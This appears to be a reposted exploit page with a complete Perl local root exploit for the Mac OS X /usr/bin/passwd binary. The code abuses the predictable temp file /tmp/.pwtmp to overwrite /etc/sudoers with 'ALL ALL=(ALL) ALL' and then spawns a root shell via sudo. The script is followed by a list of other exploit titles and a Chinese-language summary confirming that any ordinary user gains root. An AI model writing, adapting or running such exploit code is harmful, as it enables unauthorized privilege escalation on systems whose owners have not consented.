[MacOSX] "/usr/bin/passwd" Binary Local Privilege Escalation (root) Exploit"
#!/usr/bin/perl
#
# /usr/bin/passwd[OSX]: local root exploit.
#
# by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)
#
# (Apple) OSX’s /usr/bin/passwd program has support for a custom
# passwd file to be used instead of the standard/static path. this
# feature has security issues in the form of editable file(s) being
# made anywheres on the disk and also writing arbitrary data to files.
#
# the first issue will only work if the file does not already exist,
# it is done using 『umask 0;/usr/bin/passwd -i file -l 『.
# the second issue is once a successful password change has occured
# /usr/bin/passwd will insecurely re-write the passwd file to
# /tmp/.pwtmp., which can be predicted and linked to a file of
# your choice. (this exploits the second issue to overwrite
# /etc/sudoers)
#
# (for some reason this took apple 6 or so months to patch)use POSIX;
$fake_passwd=』/tmp/xpasswd.$$』;
$passwd_pid=($$ + 1);
$passwd_tempfile=』/tmp/.pwtmp.$passwd_pid』;
$sudoers=』/etc/sudoers』;sub pexit{print(『[!] @_.\n』);exit(1);}
print(『[*] /usr/bin/passwd[OSX]: local root exploit.\n』);
print(『[*] by: vade79/v9 v9\@fakehalo.us (fakehalo/realhalo)\n\n』);
unlink($fake_passwd);
print(『[*] making fake password file. ($fake_passwd)\n』);
open(FP,』>$fake_passwd』)||pexit(『couldn’t open/write to $fake_passwd』);
# uid must equal the current user.
print(FP 『ALL ALL=(ALL) ALL #::』 . getuid . 『:』 . getuid . 『::』 .
getuid . 『:』 . getuid . 『::/:/\n』);
close(FP);
print(『[*] sym-linking $sudoers -> $passwd_tempfile.\n』);
symlink($sudoers,$passwd_tempfile)||pexit(『couldn’t link files.』);
print(『[*] running /usr/bin/passwd on $fake_passwd.\n』);
print(『[*] (use ANY password longer than 4 characters)\n\n』);
system(『/usr/bin/passwd -i file -l $fake_passwd \』ALL ALL=(ALL) ALL #\』");
print(『\n[*] running \』sudo sh\』, use your REAL (user) password.\n\n』);
system(『/usr/bin/sudo sh』);
exit(0);LATEST EXPLOITS / DERNIERS EXPLOITS :
- RevilloC MailServer 1.x 『USER』 Command Handling Remote Buffer Overflow Exploit
- Microsoft Visual Studio 『dbp』 File Handling Buffer Overflow Proof of Concept Exploit
- LibTIFF Library 『BitsPerSample』 Tag Handling Client-Side Buffer Overflow Exploit
- Apple Mac OS X 『/usr/bin/passwd』 Binary Local Privilege Escalation (root) Exploit
- Microsoft Internet Explorer 『IsComponentInstalled()』 Remote Stack Overflow Exploit
- Kerio Personal Firewall Authentication Packet Handling Remote Buffer Overflow Exploit
- SCO UnixWare 『ptrace』 Call Binaries Debugging Local Privilege Escalation Exploit
- Apple Mac OS X / Safari 『__MACOSX』 ZIP Archive Remote Code Execution Exploit
- Microsoft Windows Media Player Plugin Remote Code Execution Exploit (MS06-006) #3
這是MacOSX的安全性漏洞,目前已在Tiger 10.4.3上實驗過
只要是一般普通的使用者執行這支perl程式之後,就可拿到root
推測其行為應該是當MacUser在用Terminal下使用passwd修改密碼
passwd -u會依據使用者指定的資料庫格式,來寫入密碼至正確的資料庫
首先他會先在/tmp下建立一個temporary swap file
這隻程式就會在此時代換這個檔案,使user可利用sudo變換身份為root
資料來源:
Apple Mac OS X 『/usr/bin/passwd』 Binary Local Privilege Escalation (root) Exploit